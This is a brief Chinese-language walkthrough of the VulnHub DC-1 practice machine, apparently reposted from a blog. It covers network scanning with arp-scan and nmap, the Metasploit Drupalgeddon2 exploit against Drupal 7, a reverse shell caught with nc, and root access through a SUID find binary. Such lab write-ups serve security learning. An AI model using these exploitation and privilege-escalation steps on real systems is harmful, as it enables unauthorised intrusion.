- 1.扫描主机
-
2.得到shell(2.1,2.2)只用一种即可
- 2.1开始msf漏洞利用
- 2.2脚本exp得到反弹shell
- 3.开始提权
1.扫描主机
sudo arp-scan -l
扫描端口
nmap -p- 192.168.42.147
扫描主机指纹,发现Drupal 7 cms
2.得到shell(2.1,2.2)只用一种即可
2.1开始msf漏洞利用
mfconsole
search drupal
search 7600
use exploit/unix/webapp/drupal_drupalgeddon2
set rhosts 192.168.42.147
run
看到这个,说明成功拿下shell
shell
python -c "import pty;pty.spawn('/bin/bash')"
美化一下
2.2脚本exp得到反弹shell
找到脚本,修改脚本,执行脚本
nc 监听 8888 端口 得到反弹shell
python -c "import pty;pty.spawn('/bin/bash')"
美化一下
3.开始提权
find / -perm -u=s -type f 2>/dev/null
发现/usr/bin/find,利用提权
find . -exec /bin/sh \;
文章来源:https://www.toymoban.com/news/detail-750540.html
成功提权,寻找flag文章来源地址https://www.toymoban.com/news/detail-750540.html
到了这里,关于vulnhub DC-1靶场的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!